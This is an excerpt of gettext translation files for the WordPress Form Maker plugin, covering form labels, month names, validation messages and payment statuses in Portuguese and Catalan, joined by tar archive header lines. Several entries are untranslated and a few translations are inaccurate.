#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-pt_PT.po000060400000057102152434416630012231 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:02+0400\n"
"PO-Revision-Date: 2015-05-22 17:03+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: pt\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Endereço da Rua"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Rua Linha de endereço 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Cidade"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Estado / Província / Região"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Zip Code"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "[O PAÍS]"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Janeiro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Fevereiro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Março"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Abril"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Junho"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Julho"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Agosto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Setembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Outubro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Novembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Dezembro"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "De erro, código de segurança errado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"O seu IP está na lista negra. Por favor, contate o administrador do site"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "O arquivo excede o tamanho permitido de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Desculpe, você não tem permissão para enviar esse tipo de arquivo."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "De erro, arquivo não pode ser movido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Este campo %s requer uma entrada única e este valor já tiver sido "
"apresentado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Erro, de e-mail não foi enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nada foi apresentado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Seu formulário foi submetido com êxito."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Erro, de e-mail não foi enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "O seu endereço de e-mail já foi verificado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Seu e-mail foi verificada com êxito."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "O seu e-mail de verificação expirou."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link de verificação é inválido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "campo obrigatório"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Este não é um endereço de e-mail válido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Você não pode selecionar ex datas. Escolha uma data a partir da atual."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "O"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valor deve estar entre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Quantidade"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Sua pontuação deve ser inferior a"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titulo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "$FIRST$."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Último"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Médio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Código de área"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefone"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dólares"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Do"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Para"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ir "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Redefinir "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Selecione um campo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Escolha uma data"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-ca.po000060400000057222152434416630011571 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:51+0400\n"
"PO-Revision-Date: 2015-05-22 16:51+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ca\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Adreça de carrer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Carrer Adreça 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "NomDistingit"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Estat / Província / Regió"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Postal / Codi Postal"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "País "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Gener"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Febrer"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Març"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
